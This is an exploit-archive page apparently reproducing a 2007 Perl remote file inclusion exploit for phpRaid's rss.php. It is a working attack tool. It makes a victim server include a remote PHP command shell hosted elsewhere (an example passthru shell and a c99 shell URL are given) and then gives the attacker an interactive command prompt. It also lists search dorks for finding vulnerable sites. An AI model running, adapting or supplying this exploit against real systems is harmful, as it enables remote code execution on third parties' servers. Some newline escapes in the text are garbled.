[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit
# Published : 2007-03-20
# Author : Cold Zero
# Previous Title : PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln
# Next Title : Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit
#!/usr/bin/perl
# phpraid <= 3.x.x (rss.php) Remote File Inclusion Exploit
# Download Script : http://up.9q9q.net/up/index.php?f=994a86950
# Founded & Coded by: Cold z3ro , Cold-z3ro@hotmail.com
# Dork : inurl:"phpRaid" , "phpRaid" , "roster.php?Sort=Race"
# perl cold-z3ro.pl <target> <cmd shell location> <cmd shell variable>
# cmd shell example: <?passthru($_GET[cmd]);?>
# Exploit : http://www.example.com/phpRaid_path/rss.php?phpraid_dir=Evil-script?
##
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}
head();
while()
{
print "[shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'rss.php?phpraid_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "nCould Not connectn";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[....]/;
if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"}
if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[....]/[n]/;
print "rn$finreturnnr";
last;
}
else {print "[shell] $";}}}last;
sub head()
{
print "n======================Long Life My Home Land Palestine======================rn";
print "rn";
print " * phpraid <= 3.x.x (rss.php) Remote File Inclusion Exploit *rn";
print "rn";
print "============================================================================rn";
}
sub usage()
{
head();
print "rn";
print " Usage: perl Cold-z3ro.pl <Victim> <Cmd Shell Location> <Cmd Shell Variable>rnn";
print " <Victim> - Full path to example: http://www.site.com/phpRaid/ rn";
print " <cmd shell> - Path to Cmd Shell e.g http://b0rizq.by.ru/c99.txt? rn";
print " <cmd variable> - Cmd Variable Used In Php Shell like [ id ]rn";
print "rn";
print "============================================================================rn";
print "rn";
print " found And Coded By Cold z3ro rn";
print " Cold-z3ro[at]hotmail[dot]com rn";
print " Greetz To: www.milw0rm.com , www.hack-teach.com , www.4azhar.com rn";
print " Dork : inurl:phpRaid , /roster.php?Sort=Racern";
print "rn";
print "============================================================================rn";
exit();
}
# www.Syue.com [2007-03-20]